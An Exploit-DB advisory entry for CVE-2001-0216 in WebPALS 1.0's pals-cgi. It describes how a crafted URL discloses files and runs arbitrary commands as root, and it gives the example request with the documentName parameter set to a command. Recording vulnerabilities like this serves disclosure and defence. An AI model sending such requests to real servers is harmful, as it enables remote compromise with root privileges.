PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution

2001-02-02T00:00:00
ID EDB-ID:20632
Type exploitdb
Reporter cuctema
Modified 2001-02-02T00:00:00

Description

PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution. CVE-2001-0216. Remote exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/2372/info
 
A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

http://target/pals-cgi?palsAction=restart&documentName=url_to_command